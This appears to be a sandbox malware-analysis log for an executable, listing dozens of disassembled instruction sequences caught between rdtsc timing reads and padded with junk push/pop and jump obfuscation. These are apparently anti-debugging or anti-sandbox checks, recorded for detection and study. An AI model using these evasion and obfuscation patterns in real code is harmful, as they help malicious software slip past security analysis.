Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D82D4 second address: 7D82DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D83B7 second address: 7D83CC instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0780D1BDB8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push edi 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pop edi 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D849B second address: 7D84A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D84A1 second address: 7D84A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D8677 second address: 7D8681 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D8681 second address: 7D8685 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D8685 second address: 621C12 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F07811116D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d jno 00007F07811116DCh 0x00000013 pop eax 0x00000014 nop 0x00000015 jc 00007F07811116D9h 0x0000001b push dword ptr [ebp+122D1645h] 0x00000021 jmp 00007F07811116E9h 0x00000026 call dword ptr [ebp+122D33E8h] 0x0000002c pushad 0x0000002d xor dword ptr [ebp+122D37BFh], edi 0x00000033 xor eax, eax 0x00000035 jmp 00007F07811116DBh 0x0000003a mov edx, dword ptr [esp+28h] 0x0000003e jc 00007F07811116DCh 0x00000044 mov dword ptr [ebp+122D27C5h], eax 0x0000004a mov dword ptr [ebp+122D389Ch], eax 0x00000050 cmc 0x00000051 mov esi, 0000003Ch 0x00000056 mov dword ptr [ebp+122D27C5h], edi 0x0000005c add esi, dword ptr [esp+24h] 0x00000060 cmc 0x00000061 lodsw 0x00000063 jnl 00007F07811116E4h 0x00000069 mov dword ptr [ebp+122D37BFh], edx 0x0000006f add eax, dword ptr [esp+24h] 0x00000073 mov dword ptr [ebp+122D2BF5h], eax 0x00000079 mov ebx, dword ptr [esp+24h] 0x0000007d sub dword ptr [ebp+122D2B08h], esi 0x00000083 nop 0x00000084 push eax 0x00000085 push eax 0x00000086 push edx 0x00000087 ja 00007F07811116D6h 0x0000008d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D873B second address: 621C12 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0780D1BDB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F0780D1BDC2h 0x0000000f popad 0x00000010 nop 0x00000011 pushad 0x00000012 jmp 00007F0780D1BDC8h 0x00000017 call 00007F0780D1BDBFh 0x0000001c mov dx, 4BC9h 0x00000020 pop ecx 0x00000021 popad 0x00000022 push dword ptr [ebp+122D1645h] 0x00000028 mov edx, 67C04002h 0x0000002d call dword ptr [ebp+122D33E8h] 0x00000033 pushad 0x00000034 xor dword ptr [ebp+122D37BFh], edi 0x0000003a xor eax, eax 0x0000003c jmp 00007F0780D1BDBBh 0x00000041 mov edx, dword ptr [esp+28h] 0x00000045 jc 00007F0780D1BDBCh 0x0000004b mov dword ptr [ebp+122D27C5h], eax 0x00000051 mov dword ptr [ebp+122D389Ch], eax 0x00000057 cmc 0x00000058 mov esi, 0000003Ch 0x0000005d mov dword ptr [ebp+122D27C5h], edi 0x00000063 add esi, dword ptr [esp+24h] 0x00000067 cmc 0x00000068 lodsw 0x0000006a jnl 00007F0780D1BDC4h 0x00000070 mov dword ptr [ebp+122D37BFh], edx 0x00000076 add eax, dword ptr [esp+24h] 0x0000007a mov dword ptr [ebp+122D2BF5h], eax 0x00000080 mov ebx, dword ptr [esp+24h] 0x00000084 sub dword ptr [ebp+122D2B08h], esi 0x0000008a nop 0x0000008b push eax 0x0000008c push eax 0x0000008d push edx 0x0000008e ja 00007F0780D1BDB6h 0x00000094 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D87EA second address: 7D8826 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 6DCE6995h 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007F07811116D8h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 00000015h 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 mov dword ptr [ebp+12453610h], esi 0x0000002f push 4497C37Eh 0x00000034 push esi 0x00000035 push eax 0x00000036 push edx 0x00000037 push ecx 0x00000038 pop ecx 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D89E5 second address: 7D89E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D89E9 second address: 7D89ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D89ED second address: 7D8A12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push ecx 0x0000000b pushad 0x0000000c jnp 00007F0780D1BDB6h 0x00000012 jmp 00007F0780D1BDBAh 0x00000017 popad 0x00000018 pop ecx 0x00000019 mov eax, dword ptr [eax] 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D8A12 second address: 7D8A16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D8A16 second address: 7D8A24 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0780D1BDB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D8A24 second address: 7D8A40 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F07811116DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push edi 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D8B09 second address: 7D8B0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D8C8B second address: 7D8C8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D94B5 second address: 7D94BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D94BA second address: 7D9535 instructions: 0x00000000 rdtsc 0x00000002 je 00007F07811116DCh 0x00000008 jp 00007F07811116D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 nop 0x00000011 mov edi, dword ptr [ebp+12478D1Bh] 0x00000017 lea eax, dword ptr [ebp+1248A07Ch] 0x0000001d push 00000000h 0x0000001f push eax 0x00000020 call 00007F07811116D8h 0x00000025 pop eax 0x00000026 mov dword ptr [esp+04h], eax 0x0000002a add dword ptr [esp+04h], 00000015h 0x00000032 inc eax 0x00000033 push eax 0x00000034 ret 0x00000035 pop eax 0x00000036 ret 0x00000037 pushad 0x00000038 mov dword ptr [ebp+122D2456h], eax 0x0000003e or dword ptr [ebp+122D346Ah], eax 0x00000044 popad 0x00000045 nop 0x00000046 jmp 00007F07811116E5h 0x0000004b push eax 0x0000004c push eax 0x0000004d push edx 0x0000004e push edi 0x0000004f jmp 00007F07811116E8h 0x00000054 pop edi 0x00000055 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D9535 second address: 7B87DD instructions: 0x00000000 rdtsc 0x00000002 jns 00007F0780D1BDC4h 0x00000008 jmp 00007F0780D1BDBEh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push ebx 0x00000013 call 00007F0780D1BDB8h 0x00000018 pop ebx 0x00000019 mov dword ptr [esp+04h], ebx 0x0000001d add dword ptr [esp+04h], 00000019h 0x00000025 inc ebx 0x00000026 push ebx 0x00000027 ret 0x00000028 pop ebx 0x00000029 ret 0x0000002a jp 00007F0780D1BDBBh 0x00000030 and dx, 248Ch 0x00000035 mov edx, ecx 0x00000037 lea eax, dword ptr [ebp+1248A038h] 0x0000003d jc 00007F0780D1BDBCh 0x00000043 mov edx, dword ptr [ebp+122D33DAh] 0x00000049 push eax 0x0000004a pushad 0x0000004b jmp 00007F0780D1BDC5h 0x00000050 jmp 00007F0780D1BDBFh 0x00000055 popad 0x00000056 mov dword ptr [esp], eax 0x00000059 mov dword ptr [ebp+122D2467h], eax 0x0000005f call dword ptr [ebp+122D344Bh] 0x00000065 pushad 0x00000066 push esi 0x00000067 push ebx 0x00000068 pop ebx 0x00000069 push eax 0x0000006a push edx 0x0000006b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80DC53 second address: 80DC57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80DC57 second address: 80DC5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80E211 second address: 80E215 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80E4D0 second address: 80E4DC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80E604 second address: 80E608 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80E608 second address: 80E60F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 813DBE second address: 813DC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 813DC2 second address: 813DCC instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0780D1BDB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 813DCC second address: 813DD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 813DD2 second address: 813DE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0780D1BDBCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 813DE2 second address: 813DFA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F07811116DFh 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 813DFA second address: 813E2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F0780D1BDB6h 0x0000000a pop ecx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0780D1BDC0h 0x00000014 jmp 00007F0780D1BDC5h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 812C87 second address: 812CB0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F07811116D6h 0x00000009 jmp 00007F07811116E7h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 812CB0 second address: 812CB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81354F second address: 813555 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 813555 second address: 81355B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8136BE second address: 8136CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 je 00007F07811116D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8136CF second address: 8136D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 816F50 second address: 816F78 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F07811116E4h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d jg 00007F07811116D6h 0x00000013 ja 00007F07811116D6h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 819C7A second address: 819C8B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0780D1BDBAh 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 819DF2 second address: 819DFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F07811116D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 819DFC second address: 819E0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F0780D1BDB6h 0x0000000a jp 00007F0780D1BDB6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 819E0C second address: 819E1E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F07811116D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jc 00007F07811116DCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81CE51 second address: 81CE55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81CE55 second address: 81CE5B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81CE5B second address: 81CE75 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0780D1BDBBh 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jnl 00007F0780D1BDB6h 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81C6AB second address: 81C6F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F07811116E8h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c jng 00007F0781111709h 0x00000012 jmp 00007F07811116E4h 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F07811116E1h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81C876 second address: 81C87C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81C87C second address: 81C8A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F07811116D6h 0x0000000a jnp 00007F07811116D6h 0x00000010 popad 0x00000011 jmp 00007F07811116E2h 0x00000016 push ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81CB55 second address: 81CB7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F0780D1BDC4h 0x0000000c jmp 00007F0780D1BDBBh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81CB7B second address: 81CB87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jno 00007F07811116D6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81CB87 second address: 81CB8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 821B81 second address: 821B85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 821B85 second address: 821B89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 821B89 second address: 821BA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c jmp 00007F07811116E1h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 822115 second address: 82212B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0780D1BDBCh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 82212B second address: 82212F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D8F44 second address: 7D8F51 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D8F51 second address: 7D8F56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8223A2 second address: 8223B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F0780D1BDBBh 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8223B6 second address: 8223C0 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F07811116D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 82799F second address: 8279BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0780D1BDC6h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8279BB second address: 8279D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F07811116D6h 0x0000000a jmp 00007F07811116DDh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78D01A second address: 78D02C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F0780D1BDB6h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c popad 0x0000000d pop esi 0x0000000e pushad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 826D94 second address: 826DBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F07811116DBh 0x00000009 popad 0x0000000a jmp 00007F07811116DAh 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F07811116DCh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8270C1 second address: 8270E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 jmp 00007F0780D1BDC3h 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8270E2 second address: 827126 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F07811116DFh 0x00000007 jc 00007F07811116D6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 pushad 0x00000011 jp 00007F07811116F1h 0x00000017 pushad 0x00000018 popad 0x00000019 jmp 00007F07811116E9h 0x0000001e jng 00007F07811116DCh 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 82A08C second address: 82A092 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 831661 second address: 83166B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 83166B second address: 83167E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F0780D1BDB6h 0x0000000a popad 0x0000000b jc 00007F0780D1BDC2h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 83167E second address: 83168C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F07811116D6h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 83168C second address: 831692 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 82F946 second address: 82F999 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F07811116D6h 0x00000008 jmp 00007F07811116DFh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ebx 0x00000010 push edx 0x00000011 pop edx 0x00000012 jmp 00007F07811116E7h 0x00000017 pop ebx 0x00000018 jmp 00007F07811116DDh 0x0000001d pushad 0x0000001e pushad 0x0000001f popad 0x00000020 jmp 00007F07811116DDh 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 83049C second address: 8304A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 830A49 second address: 830A4F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 830A4F second address: 830A55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 830A55 second address: 830AA0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F07811116E7h 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F07811116E1h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 jmp 00007F07811116E7h 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 831113 second address: 831117 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 831393 second address: 8313BB instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F07811116D6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F07811116E2h 0x00000011 popad 0x00000012 pushad 0x00000013 jc 00007F07811116E2h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 83A663 second address: 83A67A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 ja 00007F0780D1BDB6h 0x0000000c jmp 00007F0780D1BDBBh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 83A1D6 second address: 83A1DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8417CD second address: 8417D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8417D2 second address: 8417D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
